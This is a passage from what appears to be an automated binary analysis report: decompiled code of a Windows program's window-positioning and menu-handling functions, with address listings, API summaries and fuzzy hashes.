									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E0043BD14(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E00439390(_v8);
						}
					} else {
						_push(_t372);
						_push(0x451a4c);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037B0(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E004531C4() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E004531B8() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x487bfc; // 0x22e1310
								_t305 = E004350A4( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x487bfc; // 0x22e1310
								_t248 = E004350E8( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E0044FE34(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E004531F4() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E004531E8() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x487bfc; // 0x22e1310
										_t311 = E004350A4( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x487bfc; // 0x22e1310
										_t269 = E004350E8( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x487bfc; // 0x22e1310
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44b170; // 0x44b1bc
									_t290 = E00403740( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E004531C4() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E004531B8() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E0044FE34(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E0043BD14(_v8),  *(0x46bb98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E0043BD14(_v8),  *(0x46bb98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x406cf0, E0043BD14(_v8), 5, 0, _t220);
								E00435900();
							} else {
								_t231 = E0043BD14(_v8);
								_t232 =  *0x487bfc; // 0x22e1310
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E0043BD14(_v8), 3);
							}
							_t226 =  *0x487bfc; // 0x22e1310
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x451ee8);
				_t154 = _v8;
				 *(_t154 + 0x2ec) =  *(_t154 + 0x2ec) & 0x000000fb;
				return _t154;
			}


























































                                                                                0x00451995
                                                                                0x00451997
                                                                                0x0045199f
                                                                                0x004519a2
                                                                                0x004519a7
                                                                                0x004519a8
                                                                                0x004519ad
                                                                                0x004519b0
                                                                                0x004519ba
                                                                                0x004519cb
                                                                                0x004519d0
                                                                                0x004519df
                                                                                0x004519e4
                                                                                0x004519e4
                                                                                0x004519e9
                                                                                0x004519ee
                                                                                0x004519f6
                                                                                0x004519ff
                                                                                0x00451a00
                                                                                0x00451a05
                                                                                0x00451a08
                                                                                0x00451a12
                                                                                0x00451a18
                                                                                0x00451a1b
                                                                                0x00451a22
                                                                                0x00451dc6
                                                                                0x00451dc7
                                                                                0x00451dcc
                                                                                0x00451dcf
                                                                                0x00451dd9
                                                                                0x00451de3
                                                                                0x00451dff
                                                                                0x00451e07
                                                                                0x00451e0a
                                                                                0x00451e0c
                                                                                0x00451e11
                                                                                0x00451e11
                                                                                0x00451e16
                                                                                0x00451e19
                                                                                0x00451e20
                                                                                0x00451e2f
                                                                                0x00451e32
                                                                                0x00451e39
                                                                                0x00451e5a
                                                                                0x00451e5f
                                                                                0x00451e66
                                                                                0x00451e6b
                                                                                0x00451e6d
                                                                                0x00451e78
                                                                                0x00451e7d
                                                                                0x00451e7f
                                                                                0x00451e8e
                                                                                0x00451e8e
                                                                                0x00451e7f
                                                                                0x00451e90
                                                                                0x00451e92
                                                                                0x00451ec4
                                                                                0x00451e94
                                                                                0x00451eac
                                                                                0x00451eb2
                                                                                0x00451eb2
                                                                                0x00451e3b
                                                                                0x00451e53
                                                                                0x00451e53
                                                                                0x00451e22
                                                                                0x00451e25
                                                                                0x00451e25
                                                                                0x00451a28
                                                                                0x00451a2a
                                                                                0x00451a2b
                                                                                0x00451a30
                                                                                0x00451a33
                                                                                0x00451a3d
                                                                                0x00451a47
                                                                                0x00451a6d
                                                                                0x00451a99
                                                                                0x00451ae2
                                                                                0x00451ae2
                                                                                0x00451ae5
                                                                                0x00451ae7
                                                                                0x00451ae9
                                                                                0x00451ae9
                                                                                0x00451af9
                                                                                0x00451af9
                                                                                0x00451afc
                                                                                0x00451afe
                                                                                0x00451b00
                                                                                0x00451b00
                                                                                0x00451a9b
                                                                                0x00451a9b
                                                                                0x00451aad
                                                                                0x00451ab0
                                                                                0x00451ab2
                                                                                0x00451ab4
                                                                                0x00451ab4
                                                                                0x00451ab7
                                                                                0x00451ac7
                                                                                0x00451aca
                                                                                0x00451acc
                                                                                0x00451ace
                                                                                0x00451ace
                                                                                0x00451acc
                                                                                0x00451b05
                                                                                0x00451b07
                                                                                0x00451b07
                                                                                0x00451b0b
                                                                                0x00451b0d
                                                                                0x00451b0d
                                                                                0x00451b1d
                                                                                0x00451b26
                                                                                0x00451b33
                                                                                0x00451b3c
                                                                                0x00451b3c
                                                                                0x00451b46
                                                                                0x00451b49
                                                                                0x00451b54
                                                                                0x00451b57
                                                                                0x00451c2b
                                                                                0x00451c2d
                                                                                0x00451c33
                                                                                0x00451c36
                                                                                0x00451c3d
                                                                                0x00451c86
                                                                                0x00451c86
                                                                                0x00451c89
                                                                                0x00451c8b
                                                                                0x00451c8d
                                                                                0x00451c8d
                                                                                0x00451c9d
                                                                                0x00451c9d
                                                                                0x00451ca0
                                                                                0x00451ca2
                                                                                0x00451ca4
                                                                                0x00451ca4
                                                                                0x00451c3f
                                                                                0x00451c3f
                                                                                0x00451c51
                                                                                0x00451c51
                                                                                0x00451c54
                                                                                0x00451c56
                                                                                0x00451c58
                                                                                0x00451c58
                                                                                0x00451c5b
                                                                                0x00451c6b
                                                                                0x00451c6b
                                                                                0x00451c6e
                                                                                0x00451c70
                                                                                0x00451c72
                                                                                0x00451c72
                                                                                0x00451c70
                                                                                0x00451ca7
                                                                                0x00451ca9
                                                                                0x00451cab
                                                                                0x00451cab
                                                                                0x00451cab
                                                                                0x00451cad
                                                                                0x00451caf
                                                                                0x00451cb1
                                                                                0x00451cb1
                                                                                0x00451cb1
                                                                                0x00451cca
                                                                                0x00451cca
                                                                                0x00451b5d
                                                                                0x00451b5d
                                                                                0x00451b62
                                                                                0x00451b65
                                                                                0x00451b68
                                                                                0x00451b6f
                                                                                0x00451b77
                                                                                0x00451b7d
                                                                                0x00451b82
                                                                                0x00451b84
                                                                                0x00451b89
                                                                                0x00451b89
                                                                                0x00451b84
                                                                                0x00451b8c
                                                                                0x00451b8e
                                                                                0x00451bc7
                                                                                0x00451bc7
                                                                                0x00451bca
                                                                                0x00451bcc
                                                                                0x00451bce
                                                                                0x00451bce
                                                                                0x00451bde
                                                                                0x00451bde
                                                                                0x00451be1
                                                                                0x00451be3
                                                                                0x00451be5
                                                                                0x00451be5
                                                                                0x00451b90
                                                                                0x00451b96
                                                                                0x00451b96
                                                                                0x00451b99
                                                                                0x00451b9b
                                                                                0x00451b9d
                                                                                0x00451b9d
                                                                                0x00451ba0
                                                                                0x00451ba9
                                                                                0x00451ba9
                                                                                0x00451bac
                                                                                0x00451bae
                                                                                0x00451bb0
                                                                                0x00451bb0
                                                                                0x00451bb3
                                                                                0x00451bb3
                                                                                0x00451be8
                                                                                0x00451bea
                                                                                0x00451bec
                                                                                0x00451bec
                                                                                0x00451bec
                                                                                0x00451bee
                                                                                0x00451bf0
                                                                                0x00451bf2
                                                                                0x00451bf2
                                                                                0x00451bf2
                                                                                0x00451c02
                                                                                0x00451c0b
                                                                                0x00451c11
                                                                                0x00451c14
                                                                                0x00451c18
                                                                                0x00451c21
                                                                                0x00451c21
                                                                                0x00451c18
                                                                                0x00451b57
                                                                                0x00451cd3
                                                                                0x00451ce4
                                                                                0x00451dba
                                                                                0x00451cea
                                                                                0x00451cf4
                                                                                0x00451d47
                                                                                0x00451d5b
                                                                                0x00451d5b
                                                                                0x00451d70
                                                                                0x00451d78
                                                                                0x00451cf6
                                                                                0x00451cfb
                                                                                0x00451d06
                                                                                0x00451d15
                                                                                0x00451d25
                                                                                0x00451d25
                                                                                0x00451d86
                                                                                0x00451d95
                                                                                0x00451d95
                                                                                0x00451ce4
                                                                                0x00451a22
                                                                                0x00451ecb
                                                                                0x00451ece
                                                                                0x00451ed1
                                                                                0x00451ed6
                                                                                0x00451ed9
                                                                                0x00451ee0

                                                                                APIs
                                                                                • SendMessageA.USER32 ref: 00451D15
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: LoadMessageSendString
                                                                                • String ID:
                                                                                • API String ID: 1946433856-0
                                                                                • Opcode ID: 541b26ac64cf00f76a0f80d0906944bc33b71ebc3d0579da3fa8d669e40ef3c6
                                                                                • Instruction ID: e9062d91b70e892c12dd907cc0b9357d82f2089669128c1fe80cc258a350db4e
                                                                                • Opcode Fuzzy Hash: 541b26ac64cf00f76a0f80d0906944bc33b71ebc3d0579da3fa8d669e40ef3c6
                                                                                • Instruction Fuzzy Hash: 49F15D30A04244EFDB01DBA9C985F9E77F5AB08305F2545AAE9009B3A3D739FE44DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043C024, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E0043C024(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E00434CF4(_t43);
			}










                                                                                0x0043c027
                                                                                0x0043c02a
                                                                                0x0043c03a
                                                                                0x0043c069
                                                                                0x0043c03c
                                                                                0x0043c03c
                                                                                0x0043c050
                                                                                0x0043c05b
                                                                                0x0043c05c
                                                                                0x0043c05d
                                                                                0x0043c05e
                                                                                0x0043c05e
                                                                                0x0043c081
                                                                                0x0043c091
                                                                                0x0043c095
                                                                                0x0043c099
                                                                                0x0043c0a4
                                                                                0x0043c0a4
                                                                                0x0043c095
                                                                                0x0043c0ac
                                                                                0x0043c0b3
                                                                                0x0043c0bd
                                                                                0x0043c0c8
                                                                                0x0043c0d8

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                • String ID: ,
                                                                                • API String ID: 2266315723-3772416878
                                                                                • Opcode ID: dc5772d4a008edf40654639b35feea52976f6a5ef6516a43678eb87f8e2e69f7
                                                                                • Instruction ID: 4f0afc93a760560917b7b20bdae421720c013cc4146441cd6652f2517ecf09cd
                                                                                • Opcode Fuzzy Hash: dc5772d4a008edf40654639b35feea52976f6a5ef6516a43678eb87f8e2e69f7
                                                                                • Instruction Fuzzy Hash: 25118171504201AFCB11DE6DC881A8B77E8AF4D314F044A3EFD58EB386D739D9048B66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00449408, Relevance: 10.9, APIs: 7, Instructions: 405nativeCOMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E00449408(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				struct HWND__* _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				void* _t252;
				signed int _t258;
				void* _t266;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t285;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				signed int _t292;
				intOrPtr _t308;
				intOrPtr _t312;
				intOrPtr _t334;
				intOrPtr _t343;
				intOrPtr _t347;
				intOrPtr* _t354;
				signed int _t356;
				intOrPtr* _t357;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				intOrPtr* _t376;
				void* _t378;
				void* _t379;
				intOrPtr _t380;
				void* _t381;

				_t378 = _t379;
				_t380 = _t379 + 0xffffffd0;
				_v52 = 0;
				_t376 = __edx;
				_v8 = __eax;
				_push(_t378);
				_push(0x44993b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t380;
				_t137 =  *__edx;
				_t381 = _t137 - 0x111;
				if(_t381 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t272 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t272;
						if(_t272 < 0) {
							goto L67;
						} else {
							_t273 = _t272 + 1;
							_t368 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E004487B4(E00413FA4(_v8, _t368),  *(_t376 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t368 = _t368 + 1;
								_t273 = _t273 - 1;
								__eflags = _t273;
								if(_t273 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t275 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t275;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x486c60; // 0x487bfc
								E00455E7C( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t276 = _t275 + 1;
								_t369 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t376 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t376 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t376 + 4) & 0x0000ffff);
										}
									}
									_t158 = E00413FA4(_v8, _t369);
									_t296 = _v17;
									_v16 = E004486F8(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t369 = _t369 + 1;
									_t276 = _t276 - 1;
									__eflags = _t276;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E00432818( *((intOrPtr*)(_v16 + 0x58)), _t296,  &_v52, __eflags);
								_t165 =  *0x486c60; // 0x487bfc
								E00455E7C( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t278 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t278;
								if(_t278 < 0) {
									goto L67;
								} else {
									_t279 = _t278 + 1;
									_t370 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E00413FA4(_v8, _t370);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t376 + 8);
										if(_t173 ==  *(_t376 + 8)) {
											break;
										}
										_t177 = E004486F8(_v48, 1,  *(_t376 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t370 = _t370 + 1;
											_t279 = _t279 - 1;
											__eflags = _t279;
											if(_t279 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E00448FF8(_v48, _t376);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t381 == 0) {
						_t281 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t281;
						if(_t281 < 0) {
							goto L67;
						} else {
							_t282 = _t281 + 1;
							_t371 = 0;
							__eflags = 0;
							while(1) {
								E00413FA4(_v8, _t371);
								_t181 = E00448798( *(_t376 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t371 = _t371 + 1;
								_t282 = _t282 - 1;
								__eflags = _t282;
								if(_t282 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t284 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t284;
							if(_t284 < 0) {
								goto L67;
							} else {
								_t285 = _t284 + 1;
								_t372 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E004486F8(E00413FA4(_v8, _t372), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t372 = _t372 + 1;
									_t285 = _t285 - 1;
									__eflags = _t285;
									if(_t285 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0041F488(0, 1);
								_push(_t378);
								_push(0x44976e);
								_push( *[fs:eax]);
								 *[fs:eax] = _t380;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t378);
								_push(0x449751);
								_push( *[fs:eax]);
								 *[fs:eax] = _t380;
								E0041FE44(_v24,  *(_v40 + 0x18));
								E0041FCC0(_v24);
								E00449BE0(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t334);
								 *[fs:eax] = _t334;
								_push(0x449758);
								__eflags = 0;
								E0041FE44(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t287 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t287;
								if(_t287 < 0) {
									goto L67;
								} else {
									_t288 = _t287 + 1;
									_t373 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E004486F8(E00413FA4(_v8, _t373), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t373 = _t373 + 1;
										_t288 = _t288 - 1;
										__eflags = _t288;
										if(_t288 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_v32 = GetWindowDC( *(_v8 + 0x10));
									 *[fs:eax] = _t380;
									_v24 = E0041F488(0, 1);
									 *[fs:eax] = _t380;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t380;
									E0041FE44(_v24, _v32);
									E0041FCC0(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44986f, _t378,  *[fs:eax], 0x44988c, _t378,  *[fs:eax], 0x4498b1, _t378);
									_pop(_t343);
									 *[fs:eax] = _t343;
									_push(0x449876);
									__eflags = 0;
									E0041FE44(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t291 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t291;
									if(_t291 < 0) {
										goto L67;
									} else {
										_t292 = _t291 + 1;
										_t374 = 0;
										__eflags = 0;
										while(1) {
											_t252 =  *((intOrPtr*)( *((intOrPtr*)(E00413FA4(_v8, _t374))) + 0x34))();
											_t347 = _v36;
											__eflags = _t252 -  *((intOrPtr*)(_t347 + 0xc));
											if(_t252 !=  *((intOrPtr*)(_t347 + 0xc))) {
												_v16 = E004486F8(E00413FA4(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E00413FA4(_v8, _t374) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t374 = _t374 + 1;
											_t292 = _t292 - 1;
											__eflags = _t292;
											if(_t292 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t258 = E00448728(E00413FA4(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t258;
										if(_t258 == 0) {
											_t266 = E00413FA4(_v8, _t374);
											__eflags = 0;
											_t258 = E00448728(_t266, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t354 =  *0x486dac; // 0x487c00
										_t356 =  *( *_t354 + 0x6c);
										__eflags = _t356;
										if(_t356 != 0) {
											__eflags = _t258;
											if(_t258 == 0) {
												_t258 =  *(_t356 + 0x158);
											}
											_t308 =  *0x486dac; // 0x487c00
											__eflags =  *(_t356 + 0x228) & 0x00000008;
											if(( *(_t356 + 0x228) & 0x00000008) == 0) {
												_t357 =  *0x486c60; // 0x487bfc
												E00455B18( *_t357, _t292, _t308, _t258, _t374, _t376);
											} else {
												E00455B80();
											}
										}
									}
								} else {
									L67:
									_push( *(_t376 + 8));
									_push( *(_t376 + 4));
									_push( *_t376);
									_t144 =  *(_v8 + 0x10);
									_push(_t144);
									L00406CF8();
									 *(_t376 + 0xc) = _t144;
								}
								L68:
								_pop(_t312);
								 *[fs:eax] = _t312;
								_push(0x449942);
								return E00404320( &_v52);
							}
						}
					}
				}
				L69:
			}


































































                                                                                0x00449409
                                                                                0x0044940b
                                                                                0x00449413
                                                                                0x00449416
                                                                                0x00449418
                                                                                0x0044941d
                                                                                0x0044941e
                                                                                0x00449423
                                                                                0x00449426
                                                                                0x00449429
                                                                                0x0044942b
                                                                                0x00449430
                                                                                0x00449452
                                                                                0x00449452
                                                                                0x00449457
                                                                                0x004494a6
                                                                                0x004494a7
                                                                                0x004494a9
                                                                                0x00000000
                                                                                0x004494af
                                                                                0x004494af
                                                                                0x004494b0
                                                                                0x004494b0
                                                                                0x004494b2
                                                                                0x004494bf
                                                                                0x004494c4
                                                                                0x004494c6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004494cc
                                                                                0x004494cd
                                                                                0x004494cd
                                                                                0x004494ce
                                                                                0x00000000
                                                                                0x004494d0
                                                                                0x00000000
                                                                                0x004494d0
                                                                                0x00000000
                                                                                0x004494ce
                                                                                0x004494b2
                                                                                0x00449459
                                                                                0x00449459
                                                                                0x00449459
                                                                                0x0044945c
                                                                                0x004494d5
                                                                                0x004494d9
                                                                                0x004494dd
                                                                                0x004494df
                                                                                0x004494df
                                                                                0x004494e9
                                                                                0x004494ea
                                                                                0x004494ec
                                                                                0x00449562
                                                                                0x00449562
                                                                                0x0044956b
                                                                                0x00000000
                                                                                0x004494ee
                                                                                0x004494ee
                                                                                0x004494ef
                                                                                0x004494ef
                                                                                0x004494f1
                                                                                0x004494f1
                                                                                0x004494f5
                                                                                0x0044951b
                                                                                0x004494f7
                                                                                0x004494f7
                                                                                0x004494fa
                                                                                0x004494fc
                                                                                0x0044950e
                                                                                0x004494fe
                                                                                0x00449509
                                                                                0x00449509
                                                                                0x004494fc
                                                                                0x00449523
                                                                                0x00449528
                                                                                0x00449533
                                                                                0x00449536
                                                                                0x0044953a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0044955e
                                                                                0x0044955f
                                                                                0x0044955f
                                                                                0x00449560
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00449560
